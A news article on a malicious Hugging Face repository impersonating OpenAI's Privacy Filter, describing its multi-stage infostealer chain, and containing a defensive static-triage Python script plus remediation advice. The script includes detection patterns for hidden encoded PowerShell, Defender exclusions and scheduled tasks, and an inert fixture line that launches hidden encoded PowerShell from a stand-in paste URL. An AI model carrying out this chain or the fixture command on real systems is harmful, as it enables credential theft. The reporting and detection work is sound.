Tuesday, May 12, 2026

In brief

  • A malicious Hugging Face repository impersonating OpenAI’s Privacy Filter model reached #1 trending on the platform.
  • The repository registered approximately 244,000 downloads and 667 likes in under 18 hours before being removed.
  • The repository delivered a six-stage infostealer that harvested browser passwords, Discord tokens, crypto wallet keys, and SSH credentials from Windows machines—then silently sent everything to attacker-controlled servers.

OpenAI released Privacy Filter in late April—a small, open-weight model built to detect and automatically redact personally identifiable information from text. It landed on Hugging Face under an Apache 2.0 license and quickly attracted developer interest. Someone noticed.

Within days, a fake account named “Open-OSS” published a near-identical repository called privacy-filter. The model card was copied word for word from OpenAI’s. The only addition to the README: instructions to clone the repo and run a file called start.bat on Windows, or loader.py on Linux and Mac.

Within 18 hours, the fake repo hit #1 on Hugging Face’s trending page—racking up approximately 244,000 downloads and 667 likes. HiddenLayer, the AI security firm that flagged the campaign, found that 657 of those 667 likes came from accounts matching predictable auto-generated bot-naming patterns.

The download count was almost certainly inflated the same way: manufactured social proof to make the bait look real.

How the malware actually worked

The loader is camouflage wrapped around a dropper. The loader.py script opens with fake model-training output—progress bars, synthetic datasets, dummy class names—designed to look like a real AI loader is running.

Under the hood, it quietly disables security checks, pulls an encoded command from a public JSON paste site (so the attacker can swap the payload without touching the repository), and hands that command to PowerShell running with a hidden window. Windows users see nothing.

That command downloads a second script from a domain mimicking a blockchain analytics API. That script downloads the actual malware, a custom-built infostealer written in Rust, adds it to Windows Defender’s exclusions list, then launches it with SYSTEM-level privileges via a scheduled task that deletes itself immediately after firing. Both the Defender exclusion and the SYSTEM task require administrative rights, so the chain relies on the developer having run the launcher from an account that has them (or approving an elevation prompt). The whole chain runs and cleans up after itself, leaving almost no trace.
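One way to catch a lookalike like this before anything runs is a static triage pass over the cloned checkout. The script below is an added example written for this article; it is not HiddenLayer’s tooling and not the malware itself. The regexes, signal names, the list of paste-site hostnames and the fixture files are our own assumptions, constructed to mirror the stages described above, and the script only reads files from the checkout, never executes them.

```python
"""Static triage of a cloned Hugging Face repo for a launcher-style dropper.

Added example, not HiddenLayer's tooling and not the actual malware. Fixture
contents are constructed (fake paste URL, inert loader); nothing from the
checkout is ever imported or executed.
"""
import re
import tempfile
from pathlib import Path

# One regex per stage described above: training-output camouflage, an encoded
# command fetched from a public paste, hidden PowerShell, a Defender exclusion
# and a scheduled task. Signal names and paste-site hostnames are assumptions.
SCRIPT_SIGNALS = {
    "training_theatre": re.compile(r"\btqdm\b|Epoch\s+\d+\s*/\s*\d+", re.I),
    "remote_command_fetch": re.compile(
        r"https?://[^\s'\"]*(?:paste|jsonblob|hastebin)[^\s'\"]*", re.I),
    "hidden_powershell": re.compile(
        r"powershell(?:\.exe)?[^\n]*?-(?:w|windowstyle)[\"'\s,]+hidden", re.I),
    "encoded_command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)[\"'\s,]+[A-Za-z0-9+/=]{16,}|FromBase64String", re.I),
    "defender_exclusion": re.compile(
        r"(?:Add|Set)-MpPreference|DisableRealtimeMonitoring", re.I),
    "scheduled_task": re.compile(
        r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.I),
}
# A model card telling the user to run a launcher is itself a red flag:
# weights plus a config need no launcher script.
README_RUN_INSTRUCTION = re.compile(
    r"\b(?:run|execute|double[- ]?click)\b[^\n]{0,40}?\b(?:start\.bat|loader\.py)\b", re.I)
LAUNCHER_EXTENSIONS = {".bat", ".cmd", ".ps1", ".exe", ".vbs", ".scr"}
TEXT_EXTENSIONS = LAUNCHER_EXTENSIONS | {".py", ".sh", ".md", ".txt"}
# Any one of these is dropper behaviour and blocks the checkout outright.
BLOCKING = {"remote_command_fetch", "hidden_powershell", "encoded_command",
            "defender_exclusion", "scheduled_task"}


def scan_repo(repo: Path) -> list[tuple[str, str]]:
    """Return (relative path, signal) pairs for every hit in the checkout."""
    findings = []
    for f in sorted(repo.rglob("*")):
        if not f.is_file():
            continue
        rel, ext = str(f.relative_to(repo)), f.suffix.lower()
        if ext in LAUNCHER_EXTENSIONS:
            findings.append((rel, "launcher_file"))
        if ext not in TEXT_EXTENSIONS:
            continue  # weights and JSON config: nothing to pattern-match
        text = f.read_text(encoding="utf-8", errors="replace")
        if f.name.lower().startswith("readme") and README_RUN_INSTRUCTION.search(text):
            findings.append((rel, "readme_run_instruction"))
        findings.extend((rel, name) for name, pat in SCRIPT_SIGNALS.items() if pat.search(text))
    return findings


def verdict(findings) -> str:
    """block: dropper behaviour seen; review: launcher present; ok: weights only."""
    signals = {s for _, s in findings}
    if signals & BLOCKING:
        return "block"
    if signals & {"launcher_file", "readme_run_instruction"}:
        return "review"
    return "ok"


# Constructed, inert loader text mirroring the described chain. It is written
# to disk as data for the scanner and is never imported or executed.
CONSTRUCTED_LOADER = (
    "# constructed fixture, inert: nothing here is imported or executed\n"
    'for step in tqdm(range(3)): print(f"Epoch {step + 1}/3 loss=0.42")\n'
    'cmd = fetch("https://paste.example/raw/abc123")  # fake paste URL\n'
    'subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-EncodedCommand", cmd])\n'
)


def build_fixture(root: Path, lookalike: bool) -> Path:
    """Write a constructed checkout: a lookalike with a launcher, or a clean one."""
    repo = root / ("lookalike" if lookalike else "clean")
    repo.mkdir()
    (repo / "config.json").write_text('{"model_type": "bert"}')
    (repo / "model.safetensors").write_bytes(b"\x00" * 16)
    if lookalike:
        (repo / "README.md").write_text(
            "# privacy-filter\nClone the repo and run start.bat on Windows "
            "or loader.py on Linux/macOS.\n")
        (repo / "start.bat").write_text("@echo off\npython loader.py\n")
        (repo / "loader.py").write_text(CONSTRUCTED_LOADER)
    else:
        (repo / "README.md").write_text(
            "# clean-model\nLoad with AutoModel.from_pretrained(...) as usual.\n")
    return repo


def triage_fixtures() -> dict[str, tuple[str, set[str]]]:
    """Scan both constructed checkouts; returns {name: (verdict, signals)}."""
    with tempfile.TemporaryDirectory() as tmp:
        result = {}
        for lookalike in (True, False):
            repo = build_fixture(Path(tmp), lookalike)
            findings = scan_repo(repo)
            result[repo.name] = (verdict(findings), {s for _, s in findings})
        return result


if __name__ == "__main__":
    for name, (call, signals) in triage_fixtures().items():
        print(f"{name}: {call} {sorted(signals)}")
```

Only the signals that correspond to dropper behaviour block a checkout; a launcher file, or a model card telling you to run one, lands in “review”, because weights plus a config need no launcher. A legitimate training script that imports tqdm trips only the informative training_theatre signal, which on its own changes nothing.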

The final payload is thorough. It grabs everything stored in Chrome and Firefox—saved passwords, session cookies, browser history, encryption keys, everything. It targets Discord accounts, cryptocurrency wallet seed phrases, SSH keys, FTP credentials, and takes screenshots across all monitors. Then it packages everything as a compressed JSON bundle and ships it to attacker-controlled servers.

There’s no need for us to tell you what the hackers can do with all that information later.

The malware also checks whether it’s running in a virtual machine or a security sandbox, and quits quietly if it detects one. It’s designed to run once on real targets, steal everything, and disappear.

Why this is bigger than just one repo

This isn’t an isolated incident. It’s part of a pattern. HiddenLayer identified six additional repositories under a separate Hugging Face account named “anthfu,” uploaded in late April, using the exact same malicious loader pointing to the exact same command server. Those repos impersonated models like Qwen3, DeepSeek, and Bonsai to lure AI developers.

The infrastructure itself, a domain called api.eth-fastscan.org, was also observed hosting a separate malware sample that beacons to a command server. HiddenLayer describes the two campaigns as “possibly linked” and cautions that shared infrastructure alone doesn’t confirm a single operator.

This is what a supply chain attack against the AI developer community looks like. The attacker doesn’t break into OpenAI or Hugging Face. They just publish a convincing lookalike, game the trending algorithm with bots, and wait for developers to do the rest. A similar playbook hit the Lottie Player JavaScript library in 2024, costing one user 10 Bitcoin (worth over $700,000 at the time).

What if you downloaded it?

If you cloned Open-OSS/privacy-filter on a Windows machine and ran any file from it, you should treat the device as fully compromised. Don’t log into anything from that machine before wiping it.

After that, change all the credentials that were stored in your browser—passwords, session cookies, OAuth tokens. Move any crypto funds to a new wallet generated on a clean device ASAP and assume seed phrases were stolen.

Because it also harvests Discord tokens, which grant access to the account without a password, log out of all Discord sessions and reset that password. Any SSH keys or FTP credentials on that machine should be considered burned: generate new keys, remove the old public keys from authorized_keys on every host they reached, and change the FTP passwords.

The repository has been removed. Hugging Face has not disclosed what, if any, additional screening measures it plans to implement for trending repositories.

As of now, seven confirmed malicious repositories from this campaign have been identified. How many more exist—or existed before being detected—remains unknown.
